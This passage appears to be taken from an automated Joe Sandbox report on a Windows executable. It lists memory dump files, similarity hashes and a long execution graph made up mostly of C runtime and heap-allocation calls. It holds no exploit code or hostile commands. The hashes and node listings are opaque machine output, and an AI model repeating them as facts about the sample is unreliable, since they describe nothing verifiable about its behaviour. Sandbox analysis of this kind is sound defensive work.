                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___free_lconv_mon
                                                                                                                                            • String ID: 8"O$`'O
                                                                                                                                            • API String ID: 3903695350-3439739587
                                                                                                                                            • Opcode ID: a6d47f9ec970fed9f17e771679700233afe799ca476f558395ea1d045c980e49
                                                                                                                                            • Instruction ID: 7b0612b866e2891a8c9053f2dce7964207ff965a34f477eb1d725d908c1e9974
                                                                                                                                            • Opcode Fuzzy Hash: a6d47f9ec970fed9f17e771679700233afe799ca476f558395ea1d045c980e49
                                                                                                                                            • Instruction Fuzzy Hash: 89316D39500605EFDBA4AA3AD845F5B73E7EF0031AF10442FE446D6661DF7CAC948A1D

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:1%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:0%
                                                                                                                                            Total number of Nodes:1986
                                                                                                                                            Total number of Limit Nodes:9
                                                                                                                                            execution_graph 9907 ac5cad 9909 ac5caf shared_ptr 9907->9909 9908 ac5d17 shared_ptr __floor_pentium4 9909->9908 9910 af6c6a RtlAllocateHeap 9909->9910 9911 ac5d47 __cftof 9910->9911 9911->9911 9912 ad80c0 RtlAllocateHeap 9911->9912 9914 ac5e3e 9912->9914 9913 ac5ea6 shared_ptr __floor_pentium4 9914->9913 9915 af6c6a RtlAllocateHeap 9914->9915 9916 ac5ed2 9915->9916 9917 ac5ffe shared_ptr __floor_pentium4 9916->9917 9918 af6c6a RtlAllocateHeap 9916->9918 9919 ac601b 9918->9919 9920 ad80c0 RtlAllocateHeap 9919->9920 9921 ac6089 9920->9921 9922 ad80c0 RtlAllocateHeap 9921->9922 9923 ac60bd 9922->9923 9924 ad80c0 RtlAllocateHeap 9923->9924 9925 ac60ee 9924->9925 9926 ad80c0 RtlAllocateHeap 9925->9926 9927 ac611f 9926->9927 9928 ad80c0 RtlAllocateHeap 9927->9928 9930 ac6150 9928->9930 9929 ac65b1 shared_ptr __floor_pentium4 9930->9929 9931 af6c6a RtlAllocateHeap 9930->9931 9932 ac65dc 9931->9932 9955 ad7a00 9932->9955 9934 ac66a6 9969 ac5c10 9934->9969 9936 ac66ac 9937 ac5c10 4 API calls 9936->9937 9938 ac66b1 9937->9938 10020 ac22c0 9938->10020 9940 ac66c9 shared_ptr 9941 ad7a00 RtlAllocateHeap 9940->9941 9942 ac6732 9941->9942 9943 ac5c10 4 API calls 9942->9943 9944 ac673d 9943->9944 9945 ac22c0 4 API calls 9944->9945 9954 ac6757 shared_ptr 9945->9954 9946 ac6852 9947 ad80c0 RtlAllocateHeap 9946->9947 9949 ac689c 9947->9949 9948 ad7a00 RtlAllocateHeap 9948->9954 9950 ad80c0 RtlAllocateHeap 9949->9950 9953 ac68e3 shared_ptr __floor_pentium4 9950->9953 9951 ac5c10 4 API calls 9951->9954 9952 ac22c0 4 API calls 9952->9954 9954->9946 9954->9948 9954->9951 9954->9952 9956 ad7a26 9955->9956 9957 ad7a2d 9956->9957 9958 ad7a81 9956->9958 9959 ad7a62 9956->9959 9957->9934 9962 add3e2 RtlAllocateHeap 9958->9962 9966 ad7a76 __cftof 9958->9966 9960 ad7ab9 9959->9960 9961 ad7a69 9959->9961 9963 ac2480 RtlAllocateHeap 9960->9963 9964 add3e2 RtlAllocateHeap 9961->9964 9962->9966 9965 ad7a6f 9963->9965 9964->9965 9965->9966 9967 af6c6a RtlAllocateHeap 9965->9967 9966->9934 9968 ad7ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 9967->9968 9968->9934 10023 ac5940 9969->10023 9971 ac5c54 10026 ac4b30 9971->10026 9973 ac5d17 shared_ptr __floor_pentium4 9973->9936 9974 ac5c7b shared_ptr 9974->9973 9975 af6c6a RtlAllocateHeap 9974->9975 9976 ac5d47 __cftof 9975->9976 9976->9976 9977 ad80c0 RtlAllocateHeap 9976->9977 9979 ac5e3e 9977->9979 9978 ac5ea6 shared_ptr __floor_pentium4 9978->9936 9979->9978 9980 af6c6a RtlAllocateHeap 9979->9980 9981 ac5ed2 9980->9981 9982 ac5ffe shared_ptr __floor_pentium4 9981->9982 9983 af6c6a RtlAllocateHeap 9981->9983 9982->9936 9984 ac601b 9983->9984 9985 ad80c0 RtlAllocateHeap 9984->9985 9986 ac6089 9985->9986 9987 ad80c0 RtlAllocateHeap 9986->9987 9988 ac60bd 9987->9988 9989 ad80c0 RtlAllocateHeap 9988->9989 9990 ac60ee 9989->9990 9991 ad80c0 RtlAllocateHeap 9990->9991 9992 ac611f 9991->9992 9993 ad80c0 RtlAllocateHeap 9992->9993 9994 ac6150 9993->9994 9995 ac65b1 shared_ptr __floor_pentium4 9994->9995 9996 af6c6a RtlAllocateHeap 9994->9996 9995->9936 9997 ac65dc 9996->9997 9998 ad7a00 RtlAllocateHeap 9997->9998 9999 ac66a6 9998->9999 10000 ac5c10 4 API calls 9999->10000 10001 ac66ac 10000->10001 10002 ac5c10 4 API calls 10001->10002 10003 ac66b1 10002->10003 10004 ac22c0 4 API calls 10003->10004 10005 ac66c9 shared_ptr 10004->10005 10006 ad7a00 RtlAllocateHeap 10005->10006 10007 ac6732 10006->10007 10008 ac5c10 4 API calls 10007->10008 10009 ac673d 10008->10009 10010 ac22c0 4 API calls 10009->10010 10019 ac6757 shared_ptr 10010->10019 10011 ac6852 10012 ad80c0 RtlAllocateHeap 10011->10012 10014 ac689c 10012->10014 10013 ad7a00 RtlAllocateHeap 10013->10019 10015 ad80c0 RtlAllocateHeap 10014->10015 10018 ac68e3 shared_ptr __floor_pentium4 10015->10018 10016 ac5c10 4 API calls 10016->10019 10017 ac22c0 4 API calls 10017->10019 10018->9936 10019->10011 10019->10013 10019->10016 10019->10017 10241 ac2280 10020->10241 10033 ad7f80 10023->10033 10025 ac596b 10025->9971 10027 ac4dc2 10026->10027 10031 ac4b92 10026->10031 10027->9974 10029 ac4ce5 10029->10027 10030 ad8ca0 RtlAllocateHeap 10029->10030 10030->10029 10031->10029 10048 af6da6 10031->10048 10053 ad8ca0 10031->10053 10036 ad7f9e __cftof 10033->10036 10038 ad7fc7 10033->10038 10034 ad80b3 10035 ad9270 RtlAllocateHeap 10034->10035 10037 ad80b8 10035->10037 10036->10025 10041 ac2480 RtlAllocateHeap 10037->10041 10038->10034 10039 ad803e 10038->10039 10040 ad801b 10038->10040 10044 add3e2 RtlAllocateHeap 10039->10044 10045 ad802c __cftof 10039->10045 10040->10037 10043 add3e2 RtlAllocateHeap 10040->10043 10042 ad80bd 10041->10042 10043->10045 10044->10045 10046 af6c6a RtlAllocateHeap 10045->10046 10047 ad8095 shared_ptr 10045->10047 10046->10034 10047->10025 10049 af6db4 10048->10049 10050 af6dc2 10048->10050 10068 af6d19 10049->10068 10050->10031 10054 ad8dc9 10053->10054 10055 ad8cc3 10053->10055 10056 ad9270 RtlAllocateHeap 10054->10056 10059 ad8d2f 10055->10059 10060 ad8d05 10055->10060 10057 ad8dce 10056->10057 10058 ac2480 RtlAllocateHeap 10057->10058 10067 ad8d16 __cftof 10058->10067 10062 add3e2 RtlAllocateHeap 10059->10062 10059->10067 10060->10057 10061 ad8d10 10060->10061 10064 add3e2 RtlAllocateHeap 10061->10064 10062->10067 10063 af6c6a RtlAllocateHeap 10066 ad8dd8 10063->10066 10064->10067 10065 ad8d8b shared_ptr __cftof 10065->10031 10067->10063 10067->10065 10073 af690a 10068->10073 10072 af6d3d 10072->10031 10074 af692a 10073->10074 10080 af6921 10073->10080 10074->10080 10087 afa671 10074->10087 10081 af6d52 10080->10081 10082 af6d8f 10081->10082 10083 af6d5f 10081->10083 10225 afb67d 10082->10225 10086 af6d6e 10083->10086 10220 afb6a1 10083->10220 10086->10072 10088 afa67b __dosmaperr 10087->10088 10089 afd82f __dosmaperr RtlAllocateHeap 10088->10089 10090 afa694 10088->10090 10091 afa6bc __dosmaperr 10089->10091 10092 af694a 10090->10092 10109 af8bec 10090->10109 10094 afa6fc 10091->10094 10095 afa6c4 __dosmaperr 10091->10095 10101 afb5fb 10092->10101 10097 afa49f __dosmaperr RtlAllocateHeap 10094->10097 10098 afadf5 __freea RtlAllocateHeap 10095->10098 10099 afa707 10097->10099 10098->10090 10100 afadf5 __freea RtlAllocateHeap 10099->10100 10100->10090 10102 afb60e 10101->10102 10104 af6960 10101->10104 10102->10104 10142 aff5ab 10102->10142 10105 afb628 10104->10105 10106 afb63b 10105->10106 10107 afb650 10105->10107 10106->10107 10155 afe6b1 10106->10155 10107->10080 10110 af8bf1 __cftof 10109->10110 10114 af8bfc __cftof 10110->10114 10115 afd634 10110->10115 10136 af65ed 10114->10136 10116 afd640 __dosmaperr 10115->10116 10117 afa7c8 __dosmaperr RtlAllocateHeap 10116->10117 10121 afd667 __cftof 10116->10121 10123 afd66d __cftof __dosmaperr 10116->10123 10117->10121 10118 afd6b2 10119 af75f6 __dosmaperr RtlAllocateHeap 10118->10119 10120 afd6b7 10119->10120 10122 af6c5a __cftof RtlAllocateHeap 10120->10122 10121->10118 10121->10123 10135 afd69c 10121->10135 10122->10135 10124 afd81b __dosmaperr 10123->10124 10125 afd726 10123->10125 10126 afd751 __cftof 10123->10126 10127 af65ed __cftof 3 API calls 10124->10127 10125->10126 10139 afd62b 10125->10139 10130 afa671 __cftof 4 API calls 10126->10130 10133 afd7a5 10126->10133 10126->10135 10129 afd82e 10127->10129 10130->10133 10132 afd62b __cftof 4 API calls 10132->10126 10134 afa671 __cftof 4 API calls 10133->10134 10133->10135 10134->10135 10135->10114 10137 af64c7 __cftof 3 API calls 10136->10137 10138 af65fe 10137->10138 10140 afa671 __cftof 4 API calls 10139->10140 10141 afd630 10140->10141 10141->10132 10143 aff5b7 __dosmaperr 10142->10143 10144 afa671 __cftof 4 API calls 10143->10144 10145 aff5c0 __dosmaperr 10144->10145 10148 aff606 10145->10148 10151 aff62c 10145->10151 10147 aff5ef __cftof 10147->10148 10149 af8bec __cftof 4 API calls 10147->10149 10148->10104 10150 aff62b 10149->10150 10152 aff63a __cftof 10151->10152 10154 aff647 10151->10154 10153 aff35f __cftof RtlAllocateHeap 10152->10153 10152->10154 10153->10154 10154->10147 10156 afa671 __cftof 4 API calls 10155->10156 10157 afe6bb 10156->10157 10160 afe5c9 10157->10160 10159 afe6c1 10159->10107 10164 afe5d5 __dosmaperr 10160->10164 10161 afe5f6 10161->10159 10162 afe5ef __cftof 10162->10161 10163 af8bec __cftof 4 API calls 10162->10163 10165 afe668 10163->10165 10164->10162 10167 afadf5 __freea RtlAllocateHeap 10164->10167 10170 afe6a4 10165->10170 10171 afa72e 10165->10171 10167->10162 10170->10159 10172 afa739 __dosmaperr 10171->10172 10173 afd82f __dosmaperr RtlAllocateHeap 10172->10173 10184 afa745 10172->10184 10178 afa769 __dosmaperr 10173->10178 10174 af8bec __cftof 4 API calls 10175 afa7c7 10174->10175 10176 afa771 __dosmaperr 10181 afadf5 __freea RtlAllocateHeap 10176->10181 10177 afa7be 10185 afe4b0 10177->10185 10178->10176 10179 afa7a5 10178->10179 10180 afa49f __dosmaperr RtlAllocateHeap 10179->10180 10182 afa7b0 10180->10182 10181->10184 10183 afadf5 __freea RtlAllocateHeap 10182->10183 10183->10184 10184->10174 10184->10177 10186 afe5c9 __cftof 4 API calls 10185->10186 10187 afe4c3 10186->10187 10204 afe259 10187->10204 10190 afe4dc 10190->10170 10193 afe51f 10196 afadf5 __freea RtlAllocateHeap 10193->10196 10195 afe512 10197 afe51a 10195->10197 10201 afe535 __cftof 10195->10201 10198 afe52d 10196->10198 10199 af75f6 __dosmaperr RtlAllocateHeap 10197->10199 10198->10170 10199->10193 10200 afe561 10200->10193 10216 afe14b 10200->10216 10201->10200 10202 afadf5 __freea RtlAllocateHeap 10201->10202 10202->10200 10205 af690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10204->10205 10206 afe26b 10205->10206 10206->10190 10207 afb04b 10206->10207 10208 afb059 __dosmaperr 10207->10208 10209 af75f6 __dosmaperr RtlAllocateHeap 10208->10209 10210 afb087 10208->10210 10209->10210 10210->10193 10211 afe6c4 10210->10211 10212 afe259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10211->10212 10215 afe6e4 __cftof 10212->10215 10213 afe75a __cftof __floor_pentium4 10213->10195 10214 afe32f __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10214->10213 10215->10213 10215->10214 10217 afe157 __dosmaperr 10216->10217 10218 afe198 __cftof RtlAllocateHeap 10217->10218 10219 afe16e __cftof 10218->10219 10219->10193 10221 af690a __cftof 4 API calls 10220->10221 10222 afb6be 10221->10222 10224 afb6ce __floor_pentium4 10222->10224 10230 aff1bf 10222->10230 10224->10086 10226 afa671 __cftof 4 API calls 10225->10226 10227 afb688 10226->10227 10228 afb5fb __cftof 4 API calls 10227->10228 10229 afb698 10228->10229 10229->10086 10231 af690a __cftof 4 API calls 10230->10231 10232 aff1df __cftof 10231->10232 10233 aff29d __floor_pentium4 10232->10233 10234 afb04b __cftof RtlAllocateHeap 10232->10234 10236 aff232 __cftof 10232->10236 10233->10224 10234->10236 10237 aff2c2 10236->10237 10238 aff2ce 10237->10238 10239 aff2df 10237->10239 10238->10239 10240 afadf5 __freea RtlAllocateHeap 10238->10240 10239->10233 10240->10239 10242 ac2296 10241->10242 10245 af87f8 10242->10245 10248 af7609 10245->10248 10247 ac22a4 10247->9940 10249 af7649 10248->10249 10250 af7631 10248->10250 10249->10250 10252 af7651 10249->10252 10251 af75f6 __dosmaperr RtlAllocateHeap 10250->10251 10253 af7636 10251->10253 10254 af690a __cftof 4 API calls 10252->10254 10255 af6c5a __cftof RtlAllocateHeap 10253->10255 10256 af7661 10254->10256 10257 af7641 __floor_pentium4 10255->10257 10261 af7bc4 10256->10261 10257->10247 10277 af868d 10261->10277 10263 af76e8 10274 af7a19 10263->10274 10264 af7be4 10265 af75f6 __dosmaperr RtlAllocateHeap 10264->10265 10266 af7be9 10265->10266 10267 af6c5a __cftof RtlAllocateHeap 10266->10267 10267->10263 10268 af7bd5 10268->10263 10268->10264 10284 af7d15 10268->10284 10292 af8168 10268->10292 10297 af7dc2 10268->10297 10302 af7de8 10268->10302 10331 af7f36 10268->10331 10275 afadf5 __freea RtlAllocateHeap 10274->10275 10276 af7a29 10275->10276 10276->10257 10278 af86a5 10277->10278 10279 af8692 10277->10279 10278->10268 10280 af75f6 __dosmaperr RtlAllocateHeap 10279->10280 10281 af8697 10280->10281 10282 af6c5a __cftof RtlAllocateHeap 10281->10282 10283 af86a2 10282->10283 10283->10268 10353 af7d34 10284->10353 10286 af7d1a 10287 af7d31 10286->10287 10288 af75f6 __dosmaperr RtlAllocateHeap 10286->10288 10287->10268 10289 af7d23 10288->10289 10290 af6c5a __cftof RtlAllocateHeap 10289->10290 10291 af7d2e 10290->10291 10291->10268 10293 af8171 10292->10293 10294 af8178 10292->10294 10362 af7b50 10293->10362 10294->10268 10298 af7dcb 10297->10298 10299 af7dd2 10297->10299 10300 af7b50 4 API calls 10298->10300 10299->10268 10301 af7dd1 10300->10301 10301->10268 10303 af7e09 10302->10303 10304 af7def 10302->10304 10305 af75f6 __dosmaperr RtlAllocateHeap 10303->10305 10315 af7e39 10303->10315 10306 af7f4f 10304->10306 10307 af7fbb 10304->10307 10304->10315 10308 af7e25 10305->10308 10317 af7f92 10306->10317 10319 af7f5b 10306->10319 10309 af7fc2 10307->10309 10310 af8001 10307->10310 10307->10317 10311 af6c5a __cftof RtlAllocateHeap 10308->10311 10312 af7f69 10309->10312 10313 af7fc7 10309->10313 10427 af8604 10310->10427 10314 af7e30 10311->10314 10329 af7f77 10312->10329 10330 af7f8b 10312->10330 10421 af8241 10312->10421 10313->10317 10318 af7fcc 10313->10318 10314->10268 10315->10268 10317->10329 10317->10330 10412 af8420 10317->10412 10323 af7fdf 10318->10323 10324 af7fd1 10318->10324 10319->10312 10322 af7fa2 10319->10322 10319->10329 10322->10330 10398 af8390 10322->10398 10406 af8571 10323->10406 10324->10330 10402 af85e5 10324->10402 10329->10330 10430 af86ea 10329->10430 10330->10268 10332 af7f4f 10331->10332 10333 af7fbb 10331->10333 10340 af7f92 10332->10340 10341 af7f5b 10332->10341 10334 af7fc2 10333->10334 10335 af8001 10333->10335 10333->10340 10336 af7f69 10334->10336 10337 af7fc7 10334->10337 10338 af8604 RtlAllocateHeap 10335->10338 10339 af7f8b 10336->10339 10343 af8241 4 API calls 10336->10343 10351 af7f77 10336->10351 10337->10340 10344 af7fcc 10337->10344 10338->10351 10339->10268 10340->10339 10342 af8420 RtlAllocateHeap 10340->10342 10340->10351 10341->10336 10345 af7fa2 10341->10345 10341->10351 10342->10351 10343->10351 10346 af7fdf 10344->10346 10347 af7fd1 10344->10347 10345->10339 10349 af8390 4 API calls 10345->10349 10348 af8571 RtlAllocateHeap 10346->10348 10347->10339 10350 af85e5 RtlAllocateHeap 10347->10350 10348->10351 10349->10351 10350->10351 10351->10339 10352 af86ea 4 API calls 10351->10352 10352->10339 10356 af7d5e 10353->10356 10355 af7d40 10355->10286 10358 af7d80 10356->10358 10357 af7db7 10357->10355 10358->10357 10359 af75f6 __dosmaperr RtlAllocateHeap 10358->10359 10360 af7dac 10359->10360 10361 af6c5a __cftof RtlAllocateHeap 10360->10361 10361->10357 10363 af7b67 10362->10363 10364 af7b62 10362->10364 10370 af8ab6 10363->10370 10366 af75f6 __dosmaperr RtlAllocateHeap 10364->10366 10366->10363 10368 af75f6 __dosmaperr RtlAllocateHeap 10369 af7b99 10368->10369 10369->10268 10371 af8ad1 10370->10371 10374 af8868 10371->10374 10375 af868d RtlAllocateHeap 10374->10375 10379 af887a 10375->10379 10376 af88b3 10377 af690a __cftof 4 API calls 10376->10377 10384 af88bf 10377->10384 10378 af888f 10380 af75f6 __dosmaperr RtlAllocateHeap 10378->10380 10379->10376 10379->10378 10391 af7b85 10379->10391 10381 af8894 10380->10381 10383 af6c5a __cftof RtlAllocateHeap 10381->10383 10382 af6d52 4 API calls 10382->10384 10383->10391 10384->10382 10385 af88ee 10384->10385 10388 af8958 10385->10388 10392 af8a8d 10385->10392 10386 af8a8d RtlAllocateHeap 10389 af8a20 10386->10389 10388->10386 10390 af75f6 __dosmaperr RtlAllocateHeap 10389->10390 10389->10391 10390->10391 10391->10368 10391->10369 10393 af8a9e 10392->10393 10394 af8ab2 10392->10394 10393->10394 10395 af75f6 __dosmaperr RtlAllocateHeap 10393->10395 10394->10388 10396 af8aa7 10395->10396 10397 af6c5a __cftof RtlAllocateHeap 10396->10397 10397->10394 10399 af83ab 10398->10399 10400 af83dd 10399->10400 10434 afc88e 10399->10434 10400->10329 10403 af85f1 10402->10403 10404 af8420 RtlAllocateHeap 10403->10404 10405 af8603 10404->10405 10405->10329 10410 af8586 10406->10410 10407 af75f6 __dosmaperr RtlAllocateHeap 10408 af858f 10407->10408 10409 af6c5a __cftof RtlAllocateHeap 10408->10409 10411 af859a 10409->10411 10410->10407 10410->10411 10411->10329 10413 af8433 10412->10413 10414 af8465 10413->10414 10415 af844e 10413->10415 10420 af845e 10414->10420 10462 af779f 10414->10462 10416 af75f6 __dosmaperr RtlAllocateHeap 10415->10416 10417 af8453 10416->10417 10418 af6c5a __cftof RtlAllocateHeap 10417->10418 10418->10420 10420->10329 10422 af825a 10421->10422 10423 af779f RtlAllocateHeap 10422->10423 10424 af8297 10423->10424 10475 afd3c8 10424->10475 10426 af830d 10426->10329 10426->10426 10428 af8420 RtlAllocateHeap 10427->10428 10429 af861b 10428->10429 10429->10329 10431 af875d __floor_pentium4 10430->10431 10433 af8707 10430->10433 10431->10330 10432 afc88e __cftof 4 API calls 10432->10433 10433->10431 10433->10432 10437 afc733 10434->10437 10438 afc743 10437->10438 10439 afc76d 10438->10439 10440 afc781 10438->10440 10448 afc748 10438->10448 10441 af75f6 __dosmaperr RtlAllocateHeap 10439->10441 10442 af690a __cftof 4 API calls 10440->10442 10443 afc772 10441->10443 10444 afc78c 10442->10444 10445 af6c5a __cftof RtlAllocateHeap 10443->10445 10446 afc79c 10444->10446 10447 afc7c8 __cftof 10444->10447 10445->10448 10458 b02b7d 10446->10458 10451 afc7de __cftof 10447->10451 10457 afc815 __cftof 10447->10457 10448->10400 10451->10448 10452 af75f6 __dosmaperr RtlAllocateHeap 10451->10452 10452->10448 10453 af75f6 __dosmaperr RtlAllocateHeap 10453->10448 10454 af75f6 __dosmaperr RtlAllocateHeap 10455 afc87f 10454->10455 10456 af6c5a __cftof RtlAllocateHeap 10455->10456 10456->10448 10457->10448 10457->10454 10459 b02b98 10458->10459 10460 afc7b1 10458->10460 10459->10460 10461 b02c28 __cftof RtlAllocateHeap 10459->10461 10460->10448 10460->10453 10461->10460 10463 af77b4 10462->10463 10464 af77c3 10462->10464 10465 af75f6 __dosmaperr RtlAllocateHeap 10463->10465 10466 af77b9 10464->10466 10467 afb04b __cftof RtlAllocateHeap 10464->10467 10465->10466 10466->10420 10468 af77ea 10467->10468 10469 af7801 10468->10469 10472 af7a33 10468->10472 10471 afadf5 __freea RtlAllocateHeap 10469->10471 10471->10466 10473 afadf5 __freea RtlAllocateHeap 10472->10473 10474 af7a42 10473->10474 10474->10469 10476 afd3ee 10475->10476 10477 afd3d8 10475->10477 10476->10477 10481 afd400 10476->10481 10478 af75f6 __dosmaperr RtlAllocateHeap 10477->10478 10479 afd3dd 10478->10479 10480 af6c5a __cftof RtlAllocateHeap 10479->10480 10494 afd3e7 10480->10494 10482 afd467 10481->10482 10484 afd439 10481->10484 10483 afd485 10482->10483 10485 afd48a 10482->10485 10487 afd4ae 10483->10487 10488 afd4e4 10483->10488 10496 afd2ff 10484->10496 10501 afcbdf 10485->10501 10490 afd4cc 10487->10490 10491 afd4b3 10487->10491 10529 afcef8 10488->10529 10522 afd0e2 10490->10522 10512 afd23e 10491->10512 10494->10426 10497 afd315 10496->10497 10498 afd320 10496->10498 10497->10494 10499 afa1f1 ___std_exception_copy RtlAllocateHeap 10498->10499 10500 afd37b __cftof 10499->10500 10500->10494 10502 afcbf1 10501->10502 10503 af690a __cftof 4 API calls 10502->10503 10504 afcc05 10503->10504 10505 afcc0d 10504->10505 10506 afcc21 10504->10506 10507 af75f6 __dosmaperr RtlAllocateHeap 10505->10507 10508 afcef8 4 API calls 10506->10508 10511 afcc1c __alldvrm __cftof _strrchr 10506->10511 10509 afcc12 10507->10509 10508->10511 10510 af6c5a __cftof RtlAllocateHeap 10509->10510 10510->10511 10511->10494 10537 b031a8 10512->10537 10514 afd26c 10571 b02c47 10514->10571 10516 afd29e 10517 afd2a5 10516->10517 10518 afd2de 10516->10518 10519 afd2b7 10516->10519 10517->10494 10583 afcf9a 10518->10583 10580 afd16d 10519->10580 10523 b031a8 RtlAllocateHeap 10522->10523 10524 afd10f 10523->10524 10525 b02c47 RtlAllocateHeap 10524->10525 10526 afd147 10525->10526 10527 afd14e 10526->10527 10528 afd16d 4 API calls 10526->10528 10527->10494 10528->10527 10530 afcf10 10529->10530 10531 b031a8 RtlAllocateHeap 10530->10531 10532 afcf29 10531->10532 10533 b02c47 RtlAllocateHeap 10532->10533 10534 afcf6e 10533->10534 10535 afcf9a 4 API calls 10534->10535 10536 afcf75 10534->10536 10535->10536 10536->10494 10540 b031db 10537->10540 10538 afa1f1 ___std_exception_copy RtlAllocateHeap 10541 b0448b __cftof __floor_pentium4 10538->10541 10539 b03250 10539->10538 10540->10539 10542 b032a7 10540->10542 10541->10514 10543 b06560 RtlAllocateHeap 10542->10543 10544 b0331e 10543->10544 10545 b06670 __floor_pentium4 RtlAllocateHeap 10544->10545 10546 b03328 10545->10546 10547 b035a2 10546->10547 10549 b033cc 10546->10549 10551 b0362c __cftof 10546->10551 10548 afbac8 __cftof RtlAllocateHeap 10547->10548 10547->10551 10548->10551 10550 afbac8 __cftof RtlAllocateHeap 10549->10550 10555 b03456 10549->10555 10550->10555 10552 afbac8 __cftof RtlAllocateHeap 10551->10552 10554 b0359a 10552->10554 10553 afbac8 __cftof RtlAllocateHeap 10553->10554 10569 b03998 __cftof 10554->10569 10570 b03dec __cftof 10554->10570 10555->10553 10556 b0427d 10557 b02d10 RtlAllocateHeap 10556->10557 10563 b042c9 10557->10563 10558 b03d0c 10559 b03dda 10558->10559 10560 afbac8 __cftof RtlAllocateHeap 10558->10560 10559->10556 10561 afbac8 __cftof RtlAllocateHeap 10559->10561 10560->10559 10561->10556 10562 afbac8 RtlAllocateHeap __cftof 10562->10569 10564 afbac8 __cftof RtlAllocateHeap 10563->10564 10568 b04333 10563->10568 10564->10568 10565 afbac8 RtlAllocateHeap __cftof 10565->10570 10566 b02d10 RtlAllocateHeap 10566->10568 10567 afbac8 __cftof RtlAllocateHeap 10567->10568 10568->10541 10568->10566 10568->10567 10569->10558 10569->10562 10570->10558 10570->10565 10572 b02c6a 10571->10572 10576 b02c54 10571->10576 10575 b02c86 10572->10575 10572->10576 10573 af75f6 __dosmaperr RtlAllocateHeap 10578 b02c59 10573->10578 10574 af6c5a __cftof RtlAllocateHeap 10579 b02c63 10574->10579 10577 af75f6 __dosmaperr RtlAllocateHeap 10575->10577 10576->10573 10576->10579 10577->10578 10578->10574 10579->10516 10581 af690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10580->10581 10582 afd183 __cftof 10581->10582 10582->10517 10584 afcfab 10583->10584 10585 afcfce 10584->10585 10586 afcfb9 10584->10586 10588 af690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10585->10588 10587 af75f6 __dosmaperr RtlAllocateHeap 10586->10587 10589 afcfbe 10587->10589 10592 afcfda 10588->10592 10590 af6c5a __cftof RtlAllocateHeap 10589->10590 10591 afcfc8 10590->10591 10591->10517 10593 afa1f1 ___std_exception_copy RtlAllocateHeap 10592->10593 10594 afd057 __cftof 10593->10594 10595 ac1ca0 10596 ad80c0 RtlAllocateHeap 10595->10596 10597 ac1cb1 10596->10597 10600 add64e 10597->10600 10603 add621 10600->10603 10604 add637 10603->10604 10605 add630 10603->10605 10612 af98fa 10604->10612 10609 af988e 10605->10609 10608 ac1cbb 10610 af98fa RtlAllocateHeap 10609->10610 10611 af98a0 10610->10611 10611->10608 10615 af9630 10612->10615 10614 af992b 10614->10608 10616 af963c __dosmaperr 10615->10616 10619 af968b 10616->10619 10618 af9657 10618->10614 10620 af96a7 10619->10620 10622 af971e __dosmaperr 10619->10622 10621 af96fe 10620->10621 10620->10622 10629 afedf6 10620->10629 10621->10622 10623 afedf6 RtlAllocateHeap 10621->10623 10622->10618 10625 af9714 10623->10625 10627 afadf5 __freea RtlAllocateHeap 10625->10627 10626 af96f4 10628 afadf5 __freea RtlAllocateHeap 10626->10628 10627->10622 10628->10621 10630 afee1e 10629->10630 10631 afee03 10629->10631 10633 afee2d 10630->10633 10638 b04fdc 10630->10638 10631->10630 10632 afee0f 10631->10632 10634 af75f6 __dosmaperr RtlAllocateHeap 10632->10634 10645 b0500f 10633->10645 10637 afee14 __cftof 10634->10637 10637->10626 10639 b04fe7 10638->10639 10640 b04ffc 10638->10640 10641 af75f6 __dosmaperr RtlAllocateHeap 10639->10641 10640->10633 10642 b04fec 10641->10642 10643 af6c5a __cftof RtlAllocateHeap 10642->10643 10644 b04ff7 10643->10644 10644->10633 10646 b05027 10645->10646 10647 b0501c 10645->10647 10649 b0502f 10646->10649 10653 b05038 __dosmaperr 10646->10653 10648 afb04b __cftof RtlAllocateHeap 10647->10648 10652 b05024 10648->10652 10650 afadf5 __freea RtlAllocateHeap 10649->10650 10650->10652 10651 af75f6 __dosmaperr RtlAllocateHeap 10651->10652 10652->10637 10653->10651 10653->10652 10664 ac34a0 10665 ac34aa 10664->10665 10666 ac34ca shared_ptr 10664->10666 10665->10666 10667 af6c6a RtlAllocateHeap 10665->10667 10668 ac34f2 10667->10668 10670 ac3537 shared_ptr 10668->10670 10672 adc17c 10668->10672 10673 adc18a Concurrency::cancel_current_task 10672->10673 10676 adc0e9 10673->10676 10675 adc1aa Concurrency::cancel_current_task 10677 ac22e0 std::invalid_argument::invalid_argument 